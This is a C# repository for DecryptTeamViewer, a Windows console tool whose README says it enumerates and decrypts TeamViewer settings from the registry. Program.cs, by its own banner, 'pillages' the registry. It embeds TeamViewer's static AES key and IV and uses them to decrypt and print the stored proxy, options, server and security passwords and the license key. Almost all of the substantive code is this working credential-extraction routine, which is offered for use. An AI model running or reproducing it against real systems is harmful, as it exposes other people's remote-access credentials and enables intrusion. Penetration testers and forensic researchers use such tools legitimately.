├── DecryptTeamViewer.sln ├── DecryptTeamViewer ├── App.config ├── DecryptTeamViewer.csproj ├── Program.cs └── Properties │ └── AssemblyInfo.cs └── README.md /DecryptTeamViewer.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29728.190 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DecryptTeamViewer", "DecryptTeamViewer\DecryptTeamViewer.csproj", "{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {0C02553C-431C-4BB7-AEC1-3CDC69A660E8} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /DecryptTeamViewer/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /DecryptTeamViewer/DecryptTeamViewer.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07} 8 | Exe 9 | DecryptTeamViewer 10 | DecryptTeamViewer 11 | v4.6 12 | 512 13 | true 14 | true 15 | publish\ 16 | true 17 | Disk 18 | false 19 | Foreground 20 | 7 21 | Days 22 | false 23 | false 24 | true 25 | 0 26 | 1.0.0.%2a 27 | false 28 | false 29 | true 30 | 31 | 32 | AnyCPU 33 | true 34 | full 35 | false 36 | bin\Debug\ 37 | DEBUG;TRACE 38 | prompt 39 | 4 40 | 41 | 42 | AnyCPU 43 | pdbonly 44 | true 45 | bin\Release\ 46 | TRACE 47 | prompt 48 | 4 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | False 70 | Microsoft .NET Framework 4.6 %28x86 and x64%29 71 | true 72 | 73 | 74 | False 75 | .NET Framework 3.5 SP1 76 | false 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /DecryptTeamViewer/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using Microsoft.Win32; 4 | using System.Security.Cryptography; 5 | 6 | namespace DecryptTeamViewer 7 | { 8 | class Program 9 | { 10 | static void Main(string[] args) 11 | { 12 | Console.WriteLine("\r\n\r\n=== DecryptTeamViewer: Pillaging registry for TeamViewer information ===\r\n"); 13 | 14 | // TeamViewer version 15 | Console.WriteLine("\r\n=== TeamViewer version ===\r\n"); 16 | Console.WriteLine(GetRegValue("TeamViewerSettings", "Version")); 17 | 18 | // User info 19 | Console.WriteLine("\r\n=== User Information ===\r\n"); 20 | Console.WriteLine("Account name: " + GetRegValue("TeamViewerSettings", "OwningManagerAccountName")); 21 | Console.WriteLine("User email: " + GetRegValue("TeamViewerUserSettings", "BuddyLoginName")); 22 | 23 | // Proxy info 24 | Console.WriteLine("\r\n=== Proxy Information ===\r\n"); 25 | Console.WriteLine("Proxy IP: " + GetRegValue("TeamViewerSettings", "Proxy_IP")); 26 | Console.WriteLine("Proxy username: " + GetRegValue("TeamViewerSettings", "ProxyUsername")); 27 | var proxyPass = (byte[])GetRegValue("TeamViewerSettings", "ProxyPasswordAES"); 28 | Console.WriteLine("Proxy password: " + DecryptAES(proxyPass)); 29 | 30 | // Credentials 31 | 32 | Console.WriteLine("\r\n=== Decrypted Credentials ===\r\n"); 33 | // Options pass 34 | var optionsPass = (byte[])GetRegValue("TeamViewerSettings", "OptionsPasswordAES"); 35 | Console.WriteLine("TeamViewer options password: " + DecryptAES(optionsPass)); 36 | // Server pass 37 | var serverPass = (byte[])GetRegValue("TeamViewerSettings", "ServerPasswordAES"); 38 | Console.WriteLine("TeamViewer server password: " + DecryptAES(serverPass)); 39 | // Security pass 40 | var securityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordAES"); 41 | var exportedSecurityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordExported"); 42 | Console.WriteLine("TeamViewer security password: " + DecryptAES(securityPass)); 43 | Console.WriteLine("TeamViewer exported security password: " + DecryptAES(exportedSecurityPass)); 44 | // License 45 | var licenseKey = (byte[])GetRegValue("TeamViewerSettings", "LicenseKeyAES"); 46 | Console.WriteLine("TeamViewer license key: " + DecryptAES(licenseKey) + "\n"); 47 | 48 | } 49 | public static object GetRegValue(string hive, string value) 50 | { 51 | // Gets registry values from TeamViewer keys 52 | Object regKeyValue = new Object(); 53 | if (hive == "TeamViewerSettings") 54 | { 55 | var regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\WOW6432Node\TeamViewer", false); 56 | if (regKey != null) 57 | { 58 | regKeyValue = regKey.GetValue(value); 59 | } 60 | return regKeyValue; 61 | } 62 | else if (hive == "TeamViewerUserSettings") 63 | { 64 | var regKey = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\TeamViewer", false); 65 | if (regKey != null) 66 | { 67 | regKeyValue = regKey.GetValue(value); 68 | } 69 | return regKeyValue; 70 | } 71 | else 72 | { 73 | regKeyValue = null; 74 | return regKeyValue; 75 | } 76 | } 77 | 78 | public static string DecryptAES(byte[] encryptedPass) 79 | { 80 | try 81 | { 82 | // AES settings 83 | Aes aes = new AesManaged 84 | { 85 | Mode = CipherMode.CBC, 86 | BlockSize = 128, 87 | KeySize = 128, 88 | Padding = PaddingMode.Zeros 89 | }; 90 | // TeamViewer Key & IV 91 | byte[] key = new byte[16] { 0x06, 0x02, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00 }; 92 | byte[] IV = new byte[16] { 0x01, 0x00, 0x01, 0x00, 0x67, 0x24, 0x4F, 0x43, 0x6e, 0x67, 0x62, 0xf2, 0x5e, 0xa8, 0xd7, 0x04 }; 93 | 94 | // Decrypt AES passwords 95 | ICryptoTransform AESDecrypt = aes.CreateDecryptor(key, IV); 96 | if (encryptedPass != null) 97 | { 98 | var decrytedPass = AESDecrypt.TransformFinalBlock(encryptedPass, 0, encryptedPass.Length); 99 | string plaintextPass = Encoding.Unicode.GetString(decrytedPass); 100 | return plaintextPass; 101 | } 102 | else 103 | { 104 | return null; 105 | } 106 | } 107 | catch (Exception) 108 | { 109 | return null; 110 | } 111 | } 112 | 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /DecryptTeamViewer/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DecryptTeamViewer")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("DecryptTeamViewer")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d6aaed62-bbfc-4f2a-a2a4-35ec5b2a4e07")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DecryptTeamViewer 2 | Enumerate and decrypt TeamViewer settings from registry 3 | 4 | ## Usage 5 | .\DecryptTeamViewer.exe 6 | 7 | ![alt tag](https://thevivi.net/wp-content/uploads/2020/02/DecryptTeamViewerUsage.png) 8 | --------------------------------------------------------------------------------